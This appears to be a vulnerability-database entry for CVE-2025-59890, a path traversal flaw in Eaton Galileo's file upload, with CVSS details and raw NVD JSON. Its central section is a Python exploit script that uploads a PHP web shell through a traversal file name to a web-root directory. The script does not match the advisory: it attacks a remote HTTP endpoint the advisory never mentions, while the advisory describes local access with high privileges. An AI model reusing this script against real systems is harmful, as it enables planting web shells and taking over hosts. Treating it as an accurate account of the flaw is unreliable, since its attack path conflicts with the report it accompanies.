Security Vulnerability Report
CVE-2025-59890 CVSS 7.3 HIGH


Published: 2025-11-27 11:15:48
Last Modified: 2026-04-15 00:35:42

Description

Improper input sanitization in the file archive upload functionality of Eaton Galileo software allows path traversal, which could allow an attacker with local access to execute unauthorized code or commands. This issue has been fixed in the latest version of Galileo, which is available on the Eaton download center.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Eaton Galileo < latest version (fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-59890 PoC - Eaton Galileo Path Traversal in File Upload
Note: This is a demonstration code for security testing purposes only.
Ensure you have explicit permission before testing any system.
"""
import requests
import sys


def exploit_galileo(target_url, file_path, target_directory):
    """
    Exploit path traversal vulnerability in Eaton Galileo file upload

    Args:
        target_url: Base URL of the Galileo web interface
        file_path: Path to the malicious file to upload
        target_directory: Target directory using path traversal (e.g., ../../var/www/html)
    """
    # Construct the path traversal payload
    # The vulnerability allows directory traversal via improper input sanitization
    traversal_payload = f"{target_directory}/uploaded_shell.php"

    # Read the malicious file
    try:
        with open(file_path, 'rb') as f:
            file_content = f.read()
    except FileNotFoundError:
        print(f"[-] Error: File {file_path} not found")
        return False

    # Construct the upload request
    upload_url = f"{target_url}/api/file/upload"
    files = {
        'file': (traversal_payload, file_content, 'application/x-php')
    }
    data = {
        'path': traversal_payload
    }

    try:
        print(f"[*] Attempting to upload malicious file to {traversal_payload}")
        response = requests.post(upload_url, files=files, data=data, timeout=10)

        if response.status_code == 200:
            print("[+] File upload successful - Path traversal vulnerability confirmed")
            print(f"[+] Malicious file may be accessible at: {target_url}/{traversal_payload}")
            return True
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2025-59890-poc.py <target_url> <file_path> <target_dir>")
        print("Example: python3 cve-2025-59890-poc.py http://target.com:8080 shell.php '../../var/www/html'")
        sys.exit(1)

    exploit_galileo(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1024.pdf (Eaton security bulletin ETN-VA-2025-1024)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-59890",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T11:15:48.080",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper input sanitization in the file archives upload functionality of Eaton Galileo software allows traversing paths which could lead into an attacker with local access to execute unauthorized code or commands. This security issue has been fixed in the latest version of Galileo which is available on the Eaton download center."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:H",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.5,
          "impactScore": 5.3
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1024.pdf",
        "source": "[email protected]"
      }
    ]
  }
}
```